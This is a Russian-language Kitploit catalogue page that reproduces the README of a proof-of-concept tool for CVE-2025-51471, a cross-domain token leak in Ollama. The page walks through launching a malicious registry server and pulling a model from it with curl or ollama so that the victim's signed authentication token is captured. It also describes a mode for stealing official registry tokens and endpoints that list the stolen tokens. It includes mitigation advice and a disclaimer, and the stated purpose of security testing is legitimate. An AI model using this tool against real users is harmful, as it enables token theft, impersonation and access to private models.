Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-51471-POC — Этот PoC предназначен только для образовательных целей и авторизованного тестирования безопасности. НЕ используйте его против систем, которые вам не принадлежат. | Kitploit
Инструменты/GitHubGitHub/ajtazer/cve-2025-51471-poc
Анализ уязвимостейЭксплуатацияВеб-безопасностьАутентификацияRed Teaming
GitHubajtazer/cve-2025-51471-poc

CVE-2025-51471-POC

Этот PoC предназначен только для образовательных целей и авторизованного тестирования безопасности. НЕ используйте его против систем, которые вам не принадлежат.

Репозиторий
228 месяцев назадЕщё не проверено
Сайт

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-51471 - PoC раскрытия токена между доменами Ollama

CVE-2025-51471 Ollama CVSS

Автор: ajtazer

🔥 Обзор

Этот репозиторий содержит Proof of Concept (PoC) для CVE-2025-51471 — уязвимости раскрытия токена аутентификации между доменами, которая затрагивает все версии Ollama (включая последнюю).

📋 Описание уязвимости

Когда Ollama загружает модель с HTTPS-сервера, который отвечает 401 Unauthorized, он переходит по URL realm из заголовка WWW-Authenticate без проверки, принадлежит ли он тому же домену[...]

Это позволяет атакующему:

  1. Создать вредоносный сервер-"реестр"
  2. Обманом заставить пользователя загрузить модель с этого сервера
  3. Вернуть ответ 401 с заголовком WWW-Authenticate, указывающим на контролируемую атакующим конечную точку
  4. Ollama слепо отправляет свой токен аутентификации с подписью Ed25519 атакующему
  5. Атакующий захватывает токен

Воздействие

  • Доступ к приватным моделям на registry.ollama.ai
  • Загрузка вредоносных моделей под личностью жертвы
  • Выдача себя за жертву в реестре Ollama

🚀 Быстрый старт

Предварительные требования

  • Python 3.7+
  • Flask (pip install flask)
  • Ollama (любая версия)

Установка

root@kitploit:~
git clone https://github.com/ajtazer/CVE-2025-51471-PoC.git
cd CVE-2025-51471-PoC
pip install flask

Запуск PoC

  1. Запустите вредоносный сервер-реестр (режим HTTP):
root@kitploit:~
python3 malicious_registry.py --no-ssl
  1. В другом терминале убедитесь, что Ollama запущен:
root@kitploit:~
ollama serve
  1. Запустите эксплуатацию уязвимости:
root@kitploit:~
# Используя curl API
curl http://localhost:11434/api/pull -d '{"model": "localhost:8080/malicious/model", "insecure": true}'

# ИЛИ используя CLI Ollama
ollama pull --insecure localhost:8080/malicious/model
  1. Смотрите в терминале сервера захваченные токены!

🎬 Демо (видео PoC)

Я продемонстрировал этот PoC в коротком видео — смотрите здесь:

YouTube — Демо PoC

Примечание (режим HTTPS на macOS): При использовании HTTPS добавьте сгенерированный сертификат в связку ключей или используйте HTTP-режим с --no-ssl.

📖 Параметры использования

root@kitploit:~
python3 malicious_registry.py [-h] [--port PORT] [--no-ssl] [--steal-official]

Параметры:
  --port, -p PORT       Порт для прослушивания (по умолчанию: 8080)
  --no-ssl              Использовать HTTP вместо HTTPS
  --steal-official, -s  Перенаправлять для кражи токенов registry.ollama.ai
  --no-verbose          Отключить подробный вывод

🔧 Конечные точки API

Endpoint (конечная точка)Описание
/v2/*Фиктивная конечная точка реестра (запускает эксплуатацию)
/v2/tokenКонечная точка для захвата токена
/tokensПросмотреть все захваченные токены (JSON)
/healthПроверка работоспособности сервера

🛡️ Меры защиты

  1. Загружайте модели только из доверенных источников
  2. Будьте осторожны при загрузке моделей из сторонних реестров
  3. См. PR #10750 для официального исправления

📝 Авторство

  • Автор: ajtazer
  • Первоначальные исследователи:
    • Mohammed Benhelli (@FuzzingLabs)
    • Patrick Ventuzelo (@FuzzingLabs)
    • Отчет Huntr

⚠️ Отказ от ответственности

Данный PoC предназначен только для образовательных и авторизованных целей тестирования безопасности. Не используйте его против систем, которые вам не принадлежат.


Сделано с ❤️ с помощью Antigravity

Скачать инструмент